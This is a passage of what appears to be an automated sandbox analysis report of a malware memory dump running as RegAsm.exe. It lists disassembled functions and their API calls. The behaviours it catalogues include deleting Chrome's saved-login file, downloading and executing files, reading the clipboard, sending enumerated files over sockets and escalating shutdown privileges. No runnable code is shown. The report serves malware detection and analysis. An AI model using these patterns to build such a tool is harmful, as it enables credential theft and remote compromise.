                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                  • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-2876530381
                                                  • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • UserProfile, xrefs: 0040BA59
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                  • Opcode Fuzzy Hash: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                  • Opcode Fuzzy Hash: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  • Opcode ID: ab6c9de2ed3336f72dd1f653db28f709795552372b56743357816853fd5168b1
                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                  • Opcode Fuzzy Hash: ab6c9de2ed3336f72dd1f653db28f709795552372b56743357816853fd5168b1
                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                  • API String ID: 2825088817-3056885514
                                                  • Opcode ID: 34e9f47cf7d86a81ede4f10af600f90cd6aaddafb670a034175ab46433b67298
                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                  • Opcode Fuzzy Hash: 34e9f47cf7d86a81ede4f10af600f90cd6aaddafb670a034175ab46433b67298
                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: XPG$XPG
                                                  • API String ID: 4113138495-1962359302
                                                  • Opcode ID: 97075425f36b96f86d32918fbdfde2617eb7536786320fd924193231dd6544f4
                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                  • Opcode Fuzzy Hash: 97075425f36b96f86d32918fbdfde2617eb7536786320fd924193231dd6544f4
                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                  Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                  • CloseClipboard.USER32 ref: 0040B760
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
